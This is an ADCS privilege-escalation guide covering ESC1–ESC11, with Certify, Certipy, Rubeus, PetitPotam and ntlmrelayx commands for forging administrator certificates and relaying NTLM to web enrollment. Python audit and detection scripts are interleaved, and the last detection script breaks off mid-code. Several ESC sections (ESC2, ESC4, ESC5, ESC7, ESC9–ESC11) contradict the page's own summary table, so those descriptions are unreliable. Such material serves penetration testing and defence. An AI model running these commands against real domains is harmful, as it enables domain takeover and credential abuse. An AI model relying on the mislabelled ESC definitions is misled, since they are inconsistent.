Technique


Active Directory Certificate Services (ADCS) is Microsoft’s Public Key Infrastructure (PKI) implementation that provides certificate-based functionalities to users and machines within a domain. However, misconfigurations in ADCS can lead to various privilege escalation vulnerabilities collectively known as ESC (Escalation via Certificates) vulnerabilities.

These vulnerabilities, when exploited, can allow attackers to:

  • Obtain certificates for any user/computer in the domain
  • Impersonate other users, including domain administrators
  • Authenticate to services using certificate-based authentication
  • Escalate privileges within the domain

Prerequisites


Access Level: Varies by vulnerability (some require domain user, others just network access)

System State: Active Directory Certificate Services deployed in the domain

Tools: Certify, Certipy, Rubeus, PKINITtools, ADCS-Attack, Impacket

Enumeration


Discovering ADCS Infrastructure

Windows (Local):

# Using Certify
Certify.exe cas
 
# Using PowerShell
Get-ADObject -LDAPFilter "(objectClass=pKIEnrollmentService)" -Properties *
Get-ADObject -LDAPFilter "(objectCategory=pKICertificateTemplate)" -Properties *

Linux (Remote):

# Using Certipy
certipy find -u user@domain.local -p Password123 -dc-ip 10.10.10.10 -stdout
 
# Using ldapsearch (-x selects a simple bind for the -D/-w credentials)
ldapsearch -x -H ldap://dc.domain.local -D "user@domain.local" -w Password123 -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" "(objectClass=pKIEnrollmentService)"
 
# Using netexec
nxc ldap dc.domain.local -u user -p Password123 -M adcs

Identifying Vulnerable Templates

Windows (Local):

# Using Certify
Certify.exe find /vulnerable
 
# Checking specific ESC vulnerabilities
Certify.exe find /vulnerable /exploit

Linux (Remote):

# Using Certipy
certipy find -u user@domain.local -p Password123 -dc-ip 10.10.10.10 -vulnerable
 
# Full ADCS enumeration
certipy find -u user@domain.local -p Password123 -dc-ip 10.10.10.10 -stdout -debug

Checking Certificate Authority Access Rights

Windows (Local):

# Using Certify
Certify.exe find /ca
 
# Check ACLs on CA objects
Get-ADObject -Identity "CN=CA-NAME,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" -Properties nTSecurityDescriptor | Select-Object -ExpandProperty nTSecurityDescriptor

Linux (Remote):

# Using Certipy (the CA section of the output lists the CA's owner and access rights)
certipy find -u user@domain.local -p Password123 -dc-ip 10.10.10.10 -stdout

ESC Vulnerability Summary

| ESC Number | Vulnerability Description | Key Requirements | Primary Tool(s) |
|------------|---------------------------|------------------|-----------------|
| ESC1 | User impersonation via enrollee-supplied SAN | Client Authentication EKU; Enrollee Supplies Subject enabled; low-privilege Enroll rights; no manager approval | certipy req |
| ESC2 | User impersonation via "Any Purpose" EKU | Any Purpose EKU (or no EKU); Enrollee Supplies Subject enabled; low-privilege Enroll rights; no manager approval | certipy req (two-stage) |
| ESC3 | User impersonation via Enrollment Agent EKU | Certificate Request Agent EKU; Enrollee Supplies Subject enabled; low-privilege Enroll rights; no manager approval | certipy req -on-behalf-of |
| ESC4 | Template modification via weak ACLs | WriteOwner, WriteDacl, WriteProperty, or GenericAll on the template object for a low-privilege user | certipy template |
| ESC5 | PKI object modification via weak container ACLs | Dangerous permissions on PKI containers in AD (e.g., CN=Public Key Services) | ADSI Edit, PowerShell AD module |
| ESC6 | CA-level SAN abuse | EDITF_ATTRIBUTESUBJECTALTNAME2 flag enabled on the CA; any template with Client Authentication EKU and low-privilege Enroll rights | certipy req |
| ESC7 | CA takeover via weak CA permissions | ManageCA or ManageCertificates permission on the CA object for a low-privilege user | certipy ca |
| ESC8 | NTLM relay to web enrollment | Web Enrollment (/certsrv) enabled; NTLM authentication accepted; no EPA or HTTPS enforcement | ntlmrelayx.py, certipy relay |

Execution


ESC1: User impersonation via enrollee-supplied SAN

Vulnerability: Certificate templates with dangerous settings like:

  • Client Authentication EKU enabled
  • ENROLLEE_SUPPLIES_SUBJECT flag set
  • No manager approval required
  • Domain Users have enrollment rights

NOTE

Prerequisites: Domain user account with enrollment rights to the vulnerable template.

Exploitation:

Windows:

# Using Certify
Certify.exe find /vulnerable
 
# Request certificate using vulnerable template
Certify.exe request /ca:CA-NAME /template:VulnTemplate /altname:administrator
 
# Convert certificate to PFX format (may happen automatically with Certify)
# If you have a certificate file:
CertUtil -exportPFX -p "Password123" CertificateFile.cer OutputFile.pfx
 
# Using the certificate with Rubeus
Rubeus.exe asktgt /user:administrator /certificate:OutputFile.pfx /password:Password123 /ptt

Linux:

# Using Certipy
certipy find -u user@domain.local -p Password123 -dc-ip 10.10.10.10
 
# Request certificate using vulnerable template
certipy req -u user@domain.local -p Password123 -ca 'CA-NAME' -template 'VulnTemplate' -dc-ip 10.10.10.10
 
# Convert certificate to pfx (if needed)
certipy cert -pfx user.pfx -password 'Password123' -username 'administrator' -domain 'domain.local'
 
# Authenticate with certificate
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
 
# Alternative: Using gettgtpkinit from PKINITtools
gettgtpkinit -cert-pfx administrator.pfx -pfx-pass Password123 domain.local/administrator administrator.ccache
 
# Use the TGT
export KRB5CCNAME=administrator.ccache
impacket-psexec domain.local/administrator@dc.domain.local -k -no-pass
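The template-side conditions in the ESC Vulnerability Summary table for ESC1, ESC2 and ESC3, and the ESC1 setting list above, can be checked directly against the LDAP attributes that the Certify, Get-ADObject and ldapsearch enumeration commands return. The Python below is an added audit example; it is not code from this page, from Certify or from Certipy. The template records, the principal names, the choice of which principals count as low-privilege, and the EKU OID list are constructed assumptions, and the ESC3 check follows the table in requiring Enrollee Supplies Subject on the agent template.

```python
# Added example (not from the page, Certify or Certipy): audit certificate
# template attributes against the ESC1/ESC2/ESC3 rows of the summary table.
# Template records are constructed dictionaries shaped like the LDAP attributes
# the enumeration commands retrieve; all names and values are illustrative.

# msPKI-Certificate-Name-Flag bit: the requester supplies the subject/SAN in the CSR
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: every request waits for certificate manager approval
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

EKU_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
EKU_SMARTCARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
EKU_PKINIT_CLIENT_AUTH = "1.3.6.1.5.2.3.4"
EKU_ANY_PURPOSE = "2.5.29.37.0"
EKU_CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"
EKU_SECURE_EMAIL = "1.3.6.1.5.5.7.3.4"
EKU_EFS = "1.3.6.1.4.1.311.10.3.4"

# EKUs that let a certificate authenticate a principal (Any Purpose covers them all)
AUTH_EKUS = {EKU_CLIENT_AUTH, EKU_SMARTCARD_LOGON, EKU_PKINIT_CLIENT_AUTH, EKU_ANY_PURPOSE}

# Assumption: Enroll rights held by these principals are reachable by every account
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


def allows_authentication(ekus):
    """An empty EKU list is treated by Windows as any purpose, so it counts too."""
    return not ekus or bool(AUTH_EKUS & set(ekus))


def low_priv_can_enroll(template):
    return bool(LOW_PRIV_PRINCIPALS & set(template["enroll"]))


def requires_approval(template):
    """Manager approval or required authorized signatures stop unattended issuance."""
    pending = template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS
    return bool(pending) or template["msPKI-RA-Signature"] > 0


def audit_template(template):
    """Return the ESC identifiers (as defined in the summary table) the template meets."""
    ekus = template["pKIExtendedKeyUsage"]
    supplies_subject = bool(template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
    # All three table rows share these conditions; approval alone blocks the path
    if not (supplies_subject and low_priv_can_enroll(template) and not requires_approval(template)):
        return []
    findings = []
    if allows_authentication(ekus):
        findings.append("ESC1")
    if not ekus or EKU_ANY_PURPOSE in ekus:
        findings.append("ESC2")
    if EKU_CERT_REQUEST_AGENT in ekus:
        findings.append("ESC3")
    return findings


def audit_templates(templates):
    """Map template name -> findings, omitting templates that have none."""
    result = {}
    for name, template in templates.items():
        findings = audit_template(template)
        if findings:
            result[name] = findings
    return result


def make_template(name_flag, enrollment_flag, ra_signatures, ekus, enroll):
    return {
        "msPKI-Certificate-Name-Flag": name_flag,
        "msPKI-Enrollment-Flag": enrollment_flag,
        "msPKI-RA-Signature": ra_signatures,
        "pKIExtendedKeyUsage": ekus,
        "enroll": enroll,
    }


# Constructed sample templates (illustrative, not from a real domain)
SAMPLE_TEMPLATES = {
    "VulnTemplate": make_template(CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, 0, 0, [EKU_CLIENT_AUTH], ["Domain Users"]),
    # User-style template: subject is built from AD, not supplied by the enrollee
    "User": make_template(0, 0, 0, [EKU_CLIENT_AUTH, EKU_SECURE_EMAIL, EKU_EFS], ["Domain Users"]),
    "AnyPurposeTemplate": make_template(CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, 0, 0, [EKU_ANY_PURPOSE], ["Authenticated Users"]),
    # Agent template parked for manager approval: the approval requirement closes it
    "PendingAgentTemplate": make_template(CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, CT_FLAG_PEND_ALL_REQUESTS, 0,
                                          [EKU_CERT_REQUEST_AGENT], ["Domain Users"]),
    "EnrollmentAgentTemplate": make_template(CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, 0, 0, [EKU_CERT_REQUEST_AGENT], ["Domain Users"]),
}

if __name__ == "__main__":
    for name, findings in audit_templates(SAMPLE_TEMPLATES).items():
        print(f"{name}: {', '.join(findings)}")
```

In a live audit the dictionaries are filled from the Get-ADObject or ldapsearch results above; the enroll list is the set of principals holding the Certificate-Enrollment right in the template's DACL. Note that an Any Purpose template is reported as both ESC1 and ESC2, since Any Purpose includes client authentication, and that the PendingAgentTemplate sample shows why the mitigation section's "require manager approval" advice is effective on its own.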

ESC2: Misconfigured Certificate Template Access Control

Vulnerability: Certificate templates with over-permissive ACLs allowing users to modify settings

NOTE

Prerequisites: Domain user account with write permissions on certificate templates.

Caution: Modifying template settings is a visible change that could be detected and may disrupt legitimate certificate issuance. Consider restoring original settings after exploitation.

Exploitation:

Windows (Local):

# Using Certify to find templates with weak ACLs
Certify.exe find /vulnerable
 
# Manual modification using PowerShell
# This is complex and requires deep AD schema knowledge
# Example of enabling ENROLLEE_SUPPLIES_SUBJECT flag:
$template = Get-ADObject -Identity "CN=TargetTemplate,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" -Properties *
$newValue = $template.'msPKI-Certificate-Name-Flag' -bor 1
Set-ADObject -Identity $template.DistinguishedName -Replace @{'msPKI-Certificate-Name-Flag'=$newValue}
 
# Use the modified template as in ESC1
Certify.exe request /ca:CA-NAME /template:TargetTemplate /altname:administrator

Linux (Remote):

# Enumerate ACLs on certificate templates
certipy find -u user@domain.local -p Password123 -dc-ip 10.10.10.10 -stdout -vulnerable
 
# If you have write access to a template, modify it to be vulnerable
certipy template -u user@domain.local -p Password123 -template 'TargetTemplate' -save-old
 
# Request certificate using the modified template
certipy req -u user@domain.local -p Password123 -ca 'CA-NAME' -template 'TargetTemplate' -alt 'administrator@domain.local'
 
# After exploitation, restore the original template from the JSON saved by -save-old
certipy template -u user@domain.local -p Password123 -template 'TargetTemplate' -configuration 'TargetTemplate.json'

ESC3: Enrollment Agent Templates

Vulnerability: Certificate templates that allow users to enroll on behalf of other users

NOTE

Prerequisites:

  • Access to an Enrollment Agent certificate
  • The CA must have a template with the Certificate Request Agent EKU
  • Permission to enroll in both templates

Exploitation:

Windows (Local):

# Using Certify
# Request enrollment agent certificate
Certify.exe request /ca:CA-NAME /template:EnrollmentAgentTemplate
 
# Request certificate on behalf of another user
# This typically requires Windows Certificate MMC or web enrollment
# More complex to automate in PowerShell

Linux (Remote):

# Request enrollment agent certificate
certipy req -u user@domain.local -p Password123 -ca 'CA-NAME' -template 'EnrollmentAgentTemplate'
 
# Request certificate on behalf of another user
certipy req -u user@domain.local -p Password123 -ca 'CA-NAME' -template 'UserTemplate' -on-behalf-of 'administrator@domain.local' -pfx enrollment-agent.pfx

ESC4: Vulnerable Certificate Authority Access Control

Vulnerability: Over-permissive ACLs on the Certificate Authority itself

WARNING

Prerequisites: Domain user with manage CA permissions.

Impact: This exploitation modifies CA settings, which can have significant operational impact on the PKI infrastructure. Changes should be reverted after testing.

Exploitation:

Windows (Local):

# Using Certify to enumerate CA permissions
Certify.exe find /ca
 
# Using certutil to enable a template on the CA (requires ManageCA rights)
certutil -config "CA-NAME\domain-DC-CA" -SetCATemplates +VulnTemplate
 
# After exploitation, disable the template
certutil -config "CA-NAME\domain-DC-CA" -SetCATemplates -VulnTemplate

Linux (Remote):

# Enumerate CA permissions (listed under the CA's properties in the output)
certipy find -u user@domain.local -p Password123 -dc-ip 10.10.10.10 -stdout
 
# If manage CA permission, enable vulnerable template:
certipy ca -u user@domain.local -p Password123 -ca 'CA-NAME' -enable-template 'VulnTemplate'
 
# After exploitation, disable the template
certipy ca -u user@domain.local -p Password123 -ca 'CA-NAME' -disable-template 'VulnTemplate'
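Both the ESC2 section above (write access to a template object) and this ESC4 section (management rights on the CA object) come down to the same question: does a low-privileged principal hold a control right in the object's DACL? The Python below is an added example of that check over an SDDL security descriptor, the form in which (Get-Acl).Sddl or the nTSecurityDescriptor queried in the Enumeration section can be exported; it is not code from this page, Certify or Certipy. The SDDL strings are constructed samples, the two-letter right and trustee aliases are the standard SDDL ones, and the GUID 0e10c968-78fb-11d2-90d4-00c04f79dc55 is the Certificate-Enrollment extended right, shown so that a plain Enroll grant is visibly not a finding.

```python
# Added example (not from the page, Certify or Certipy): report control rights
# that low-privileged principals hold on a certificate template or CA object,
# i.e. the ACL conditions the summary table lists for ESC4/ESC5/ESC7.
# Input is the object's security descriptor in SDDL form; samples are constructed.
import re

# Access-right codes as they appear in an SDDL ACE rights field (subset)
SDDL_RIGHTS = {
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
    "WO": 0x00080000, "WD": 0x00040000, "RC": 0x00020000, "SD": 0x00010000,
    "CC": 0x00000001, "DC": 0x00000002, "LC": 0x00000004, "SW": 0x00000008,
    "RP": 0x00000010, "WP": 0x00000020, "DT": 0x00000040, "LO": 0x00000080,
    "CR": 0x00000100,
}
# Rights that let the holder change the object or its ACL
# (GenericAll, GenericWrite, WriteOwner, WriteDacl, WriteProperty)
CONTROL_RIGHTS = ["GA", "GW", "WO", "WD", "WP"]

# Assumption: these well-known trustees are "low-privilege". As a trustee
# alias "WD" means Everyone; as a right it means WRITE_DAC (position decides).
LOW_PRIV_ALIASES = {"DU": "Domain Users", "DC": "Domain Computers",
                    "AU": "Authenticated Users", "WD": "Everyone"}
LOW_PRIV_SIDS = {"S-1-5-11": "Authenticated Users", "S-1-1-0": "Everyone"}
LOW_PRIV_RIDS = {"513": "Domain Users", "515": "Domain Computers"}

ACE_RE = re.compile(r"\(([^)]*)\)")


def rights_mask(field):
    """Decode a rights field: a hex number or concatenated two-letter codes."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        code = field[i:i + 2]
        if code not in SDDL_RIGHTS:
            raise ValueError(f"unknown SDDL right {code!r}")
        mask |= SDDL_RIGHTS[code]
    return mask


def low_priv_name(trustee):
    """Display name if the trustee is a low-privileged well-known principal, else None."""
    if trustee in LOW_PRIV_ALIASES:
        return LOW_PRIV_ALIASES[trustee]
    if trustee in LOW_PRIV_SIDS:
        return LOW_PRIV_SIDS[trustee]
    rid = trustee.rsplit("-", 1)[-1]
    if trustee.startswith("S-1-5-21-") and rid in LOW_PRIV_RIDS:
        return f"{LOW_PRIV_RIDS[rid]} ({trustee})"
    return None


def dacl_aces(sddl):
    """Yield (ace_type, rights, object_guid, trustee) for each ACE in the D: part."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    if not m:
        return
    for ace in ACE_RE.findall(m.group(1)):
        # ace_type;ace_flags;rights;object_guid;inherit_object_guid;trustee
        fields = ace.split(";")
        yield fields[0], fields[2], fields[3], fields[5]


def find_weak_aces(sddl):
    """List (principal, [control rights]) for allow ACEs that grant control
    rights to low-privileged trustees. Object-scoped ACEs (OA) are reported
    too; the reviewer then checks which attribute the GUID scopes them to."""
    weak = []
    for ace_type, rights, _guid, trustee in dacl_aces(sddl):
        if ace_type not in ("A", "OA"):  # deny ACEs grant nothing
            continue
        who = low_priv_name(trustee)
        if who is None:
            continue
        mask = rights_mask(rights)
        held = [r for r in CONTROL_RIGHTS if mask & SDDL_RIGHTS[r]]
        if held:
            weak.append((who, held))
    return weak


# Constructed: a template whose DACL gives Domain Users write access to properties
WEAK_TEMPLATE_SDDL = (
    "O:EAG:EAD:PAI"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;EA)"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
    "(A;;RPLCLORC;;;AU)"
    "(OA;;CR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DU)"  # Enroll right only
    "(A;;RPWPLCLORC;;;DU)"
)
# Constructed: the same object after remediation (Domain Users keep read + Enroll)
HARDENED_TEMPLATE_SDDL = (
    "O:EAG:EAD:PAI"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;EA)"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
    "(A;;RPLCLORC;;;AU)"
    "(OA;;CR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DU)"
    "(A;;RPLCLORC;;;DU)"
)

if __name__ == "__main__":
    print("weak:", find_weak_aces(WEAK_TEMPLATE_SDDL))
    print("hardened:", find_weak_aces(HARDENED_TEMPLATE_SDDL))
```

The same function works for the CA object's descriptor (the ESC4 case on this page) because the dangerous rights are identical; only the object being described changes. A finding for WriteProperty scoped to a single attribute GUID still deserves a look, since a write to msPKI-Certificate-Name-Flag alone is enough to turn a template into the ESC1 shape.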

ESC5: Vulnerable Certificate Authority Enrollment Access Control

Vulnerability: Certificate Authority with dangerous enrollment policies

NOTE

Prerequisites: Write permissions on CA enrollment policies.

Caution: Modifying enrollment policies may disrupt legitimate certificate operations.

Exploitation: Similar to ESC4, focuses on enrollment access controls rather than management access controls.

ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 Flag Set

Vulnerability: CA configured with EDITF_ATTRIBUTESUBJECTALTNAME2 flag allowing subject alternative name manipulation

NOTE

Prerequisites: The CA must have the EDITF_ATTRIBUTESUBJECTALTNAME2 flag enabled.

Detection Risk: This attack doesn’t modify settings but can create detectable certificate requests.

Exploitation:

Windows (Local):

# Check if flag is enabled using certutil
certutil -config "CA-NAME\domain-DC-CA" -getreg policy\EditFlags
# Look for EDITF_ATTRIBUTESUBJECTALTNAME2 (0x40000) in the flags
 
# Using Certify
Certify.exe request /ca:CA-NAME /template:User /altname:administrator

Linux (Remote):

# Check if flag is enabled (reported as "User Specified SAN" under the CA's properties in the output)
certipy find -u user@domain.local -p Password123 -dc-ip 10.10.10.10 -stdout
 
# Request certificate with alternative name
certipy req -u user@domain.local -p Password123 -ca 'CA-NAME' -template 'User' -san 'administrator@domain.local'
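The Windows check above reads the CA's EditFlags value and looks for 0x40000; the summary table adds that ESC6 also needs a template with an authentication EKU that low-privileged principals can enroll in. The Python below is an added example that decodes certutil's -getreg output and applies both conditions; it is not code from this page, certutil or Certipy. The certutil output is a constructed sample in the shape of the real one (the parser relies only on the "EditFlags REG_DWORD = <hex>" line), the flag-name table is a subset of the documented EditFlags bits, and the template list and low-privilege principal set are assumptions.

```python
# Added example (not from the page, certutil or Certipy): decode the CA's
# EditFlags from `certutil -config "CA-HOST\CA-NAME" -getreg policy\EditFlags`
# and report ESC6 exposure as the summary table defines it. Samples are constructed.
import re

EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000

# Subset of EditFlags bits, keyed by value, named as certutil prints them
EDIT_FLAG_NAMES = {
    0x00000002: "EDITF_REQUESTEXTENSIONLIST",
    0x00000004: "EDITF_DISABLEEXTENSIONLIST",
    0x00000008: "EDITF_ADDOLDKEYUSAGE",
    0x00000040: "EDITF_BASICCONSTRAINTSCRITICAL",
    0x00000100: "EDITF_ENABLEAKIKEYID",
    0x00010000: "EDITF_ENABLEDEFAULTSMIME",
    0x00040000: "EDITF_ATTRIBUTESUBJECTALTNAME2",
    0x00100000: "EDITF_AUDITCERTTEMPLATELOAD",
}

EDITFLAGS_RE = re.compile(r"EditFlags\s+REG_DWORD\s*=\s*([0-9a-fA-F]+)")

EKU_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
EKU_SERVER_AUTH = "1.3.6.1.5.5.7.3.1"
EKU_SECURE_EMAIL = "1.3.6.1.5.5.7.3.4"
EKU_EFS = "1.3.6.1.4.1.311.10.3.4"
EKU_SMARTCARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
EKU_PKINIT_CLIENT_AUTH = "1.3.6.1.5.2.3.4"
EKU_ANY_PURPOSE = "2.5.29.37.0"
AUTH_EKUS = {EKU_CLIENT_AUTH, EKU_SMARTCARD_LOGON, EKU_PKINIT_CLIENT_AUTH, EKU_ANY_PURPOSE}
# Assumption: Enroll rights held by these principals count as low-privilege
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


def parse_edit_flags(certutil_output):
    """Return the EditFlags DWORD from certutil's -getreg output."""
    m = EDITFLAGS_RE.search(certutil_output)
    if not m:
        raise ValueError("no 'EditFlags REG_DWORD = ...' line found")
    return int(m.group(1), 16)


def decode_edit_flags(value):
    """Names of the known bits set in an EditFlags value, lowest bit first."""
    return [name for bit, name in sorted(EDIT_FLAG_NAMES.items()) if value & bit]


def san2_enabled(certutil_output):
    return bool(parse_edit_flags(certutil_output) & EDITF_ATTRIBUTESUBJECTALTNAME2)


def esc6_exposed_templates(certutil_output, templates):
    """Templates that complete the ESC6 condition once the CA honours request-attribute SANs."""
    if not san2_enabled(certutil_output):
        return []
    return [
        name for name, t in templates.items()
        if (not t["ekus"] or AUTH_EKUS & set(t["ekus"])) and LOW_PRIV_PRINCIPALS & set(t["enroll"])
    ]


# Constructed sample in the shape of certutil's -getreg policy\EditFlags output
SAN2_ENABLED_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\domain-DC-CA\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy:

  EditFlags REG_DWORD = 15014e (1376590)
    EDITF_REQUESTEXTENSIONLIST -- 2
    EDITF_DISABLEEXTENSIONLIST -- 4
    EDITF_ADDOLDKEYUSAGE -- 8
    EDITF_BASICCONSTRAINTSCRITICAL -- 40 (64)
    EDITF_ENABLEAKIKEYID -- 100 (256)
    EDITF_ENABLEDEFAULTSMIME -- 10000 (65536)
    EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144)
    EDITF_AUDITCERTTEMPLATELOAD -- 100000 (1048576)
CertUtil: -getreg command completed successfully.
"""
# Constructed: the same CA with the flag cleared (the default value, 11014e)
SAN2_DISABLED_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\domain-DC-CA\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy:

  EditFlags REG_DWORD = 11014e (1114446)
CertUtil: -getreg command completed successfully.
"""

# Constructed template summaries (EKU list and principals holding Enroll)
SAMPLE_TEMPLATES = {
    "User": {"ekus": [EKU_CLIENT_AUTH, EKU_SECURE_EMAIL, EKU_EFS], "enroll": ["Domain Users"]},
    "Machine": {"ekus": [EKU_CLIENT_AUTH, EKU_SERVER_AUTH], "enroll": ["Domain Computers"]},
    "WebServer": {"ekus": [EKU_SERVER_AUTH], "enroll": ["Domain Admins"]},
}

if __name__ == "__main__":
    print("flags:", decode_edit_flags(parse_edit_flags(SAN2_ENABLED_OUTPUT)))
    print("ESC6 exposure:", esc6_exposed_templates(SAN2_ENABLED_OUTPUT, SAMPLE_TEMPLATES))
```

The point of the second condition is that clearing the flag (certutil -config "CA-HOST\CA-NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2, then restarting the CertSvc service) removes the whole class at once, whereas tightening templates one by one only shrinks the list; the default templates in the sample show why a CA with this flag set is exposed even when no template is otherwise misconfigured.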

ESC7: Vulnerable Certificate Authority Enrollment Service Access Control

Vulnerability: Misconfigured access controls on the web enrollment service

NOTE

Prerequisites:

  • Web enrollment must be enabled
  • User must have enrollment permissions

Exploitation:

Windows (Local):

# Using Certify to check web enrollment
Certify.exe find
 
# Typically requires manual exploitation via browser
# Navigate to https://ca-server/certsrv/
# Request certificate > advanced certificate request > submit PKCS #10 request

Linux (Remote):

# Enumerate web enrollment status (reported as "Web Enrollment" under the CA's properties in the output)
certipy find -u user@domain.local -p Password123 -dc-ip 10.10.10.10 -stdout
 
# If vulnerable, generate certificate request and submit via the enrollment service
# This may require custom scripting to interact with the web enrollment interface

ESC8: NTLM Relay to Active Directory Certificate Services Web Enrollment

Vulnerability: NTLM authentication on the Certificate Enrollment Web Service can be relayed

WARNING

Prerequisites:

  • Web enrollment must use NTLM authentication
  • No EPA (Extended Protection for Authentication)
  • No HTTPS enforced

Impact: Requires triggering NTLM authentication from a privileged account, which may create logs and alerts.

Exploitation:

Windows (Local):

# From Windows, you typically need multiple tools
# 1. Set up Inveigh for NTLM capturing and relaying
Import-Module .\Inveigh.ps1
Inveigh-Relay -ConsoleOutput Y -Target http://adcs.domain.local/certsrv/ -Attack ADCS
 
# 2. Coerce authentication from a target
# Using SpoolSample, PetitPotam, or other authentication coercion technique
.\PetitPotam.exe -d domain.local -u user -p password ATTACKER-IP DC-IP

Linux (Remote):

# Set up relay attack with ntlmrelayx
ntlmrelayx.py -t http://adcs.domain.local/certsrv/ -smb2support --adcs
 
# Coerce authentication from target using Impacket tools
# Using PetitPotam (MS-EFSRPC) coercion
impacket-petitpotam -d domain.local -u user -p password ATTACKER-IP DC-IP
 
# Or using PrinterBug (MS-RPRN) coercion
impacket-printerbug domain.local/user:password@DC-IP ATTACKER-IP

ESC9: No Security Extension

Vulnerability: Templates without security extensions allowing for certificate misuse

NOTE

Prerequisites: Access to templates without proper security extensions.

Exploitation:

Windows (Local):

# Using Certify
Certify.exe find /vulnerable
 
# Request certificate from vulnerable template
Certify.exe request /ca:CA-NAME /template:VulnTemplate
 
# Use for unintended authentication scenarios

Linux (Remote):

# Request certificate without security extensions
certipy req -u user@domain.local -p Password123 -ca 'CA-NAME' -template 'VulnTemplate'
 
# Use for unintended authentication scenarios

ESC10: Certificate Authority Configuration Disclosure

Vulnerability: Disclosure of CA configuration information to unprivileged users

NOTE

Prerequisites: Network access to the CA.

Impact: Passive information gathering only, no system changes.

Exploitation: Information gathered can be used to identify other vulnerabilities and aid in attacks.

ESC11: Subject Alternative Name Untrusted Values

Vulnerability: Certain certificate fields are not properly validated

NOTE

Prerequisites: Access to templates that don’t properly validate SAN fields.

Detection Risk: Creates certificate requests that may be logged and detected.

Exploitation:

Windows (Local):

# Using Certify
Certify.exe request /ca:CA-NAME /template:User /altname:administrator

Linux (Remote):

# Request certificate with manipulated alternative name values
certipy req -u user@domain.local -p Password123 -ca 'CA-NAME' -template 'User' -san 'administrator@domain.local'

Detection & Mitigation


Detection

  • Monitor certificate issuance, especially for sensitive principals
  • Look for unusual certificate request patterns
  • Audit certificate template modifications
  • Monitor for the use of certificates for authentication
  • Watch for changes to CA configuration settings
  • Review logs for suspicious certificate enrollments
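The first four detection bullets come down to one comparison: who requested the certificate versus whom the issued certificate names, plus a volume check for unusual request patterns. The Python below is an added example of that logic, not a detection this page or any vendor ships. The issuance records are constructed; their fields are modelled on the Requester and Attributes fields of Windows Security event 4887 (Certificate Services approved a certificate request and issued a certificate) together with the issued certificate's SAN UPN, which that event does not carry and is assumed here to be joined in from the CA database by the log pipeline. The SENSITIVE_PRINCIPALS set and the bulk threshold are assumptions to tune per environment.

```python
# Added example (not from the page or any vendor): flag certificate issuance
# where the SAN names a principal other than the requester, and bulk enrollment
# by one account. Records are constructed; see the lead-in for what they model.
import re
from collections import Counter

# Assumptions: principals whose appearance in a SAN should always alert, and
# how many requests from one account in the analysed batch count as bulk.
SENSITIVE_PRINCIPALS = {"administrator", "krbtgt"}
BULK_THRESHOLD = 5

# A SAN passed as a request attribute (honoured only when the CA has
# EDITF_ATTRIBUTESUBJECTALTNAME2 set) shows up in the event's Attributes field.
SAN_UPN_ATTR = re.compile(r"san:upn=([^,\s]+)", re.IGNORECASE)


def requester_account(requester):
    """'DOMAIN\\jdoe' -> 'jdoe'; 'jdoe@domain.local' -> 'jdoe'."""
    name = requester.split("\\")[-1]
    return name.split("@")[0].lower()


def san_upn(record):
    """Return (upn, origin): origin is 'request-attribute' when the UPN was
    supplied as a request attribute, 'certificate' when read from the issued
    certificate, or (None, None) when the certificate has no UPN SAN."""
    m = SAN_UPN_ATTR.search(record.get("attributes") or "")
    if m:
        return m.group(1).lower(), "request-attribute"
    upn = record.get("san_upn")
    return (upn.lower(), "certificate") if upn else (None, None)


def analyse(records):
    """Return (subject, reason, severity) tuples for the records worth a look."""
    alerts = []
    for r in records:
        upn, origin = san_upn(r)
        if upn is None:
            continue
        target = upn.split("@")[0]
        if target != requester_account(r["requester"]):
            severity = "high" if target in SENSITIVE_PRINCIPALS else "medium"
            alerts.append((r["request_id"], f"san-mismatch:{origin}", severity))
    counts = Counter(requester_account(r["requester"]) for r in records)
    for who, n in counts.items():
        if n >= BULK_THRESHOLD:
            alerts.append((who, "bulk-enrollment", "low"))
    return alerts


def record(request_id, requester, template, san_upn_value=None, attributes=""):
    return {"request_id": request_id, "requester": requester, "template": template,
            "san_upn": san_upn_value, "attributes": attributes}


# Constructed issuance records (illustrative names, not from a real CA)
SAMPLE_RECORDS = [
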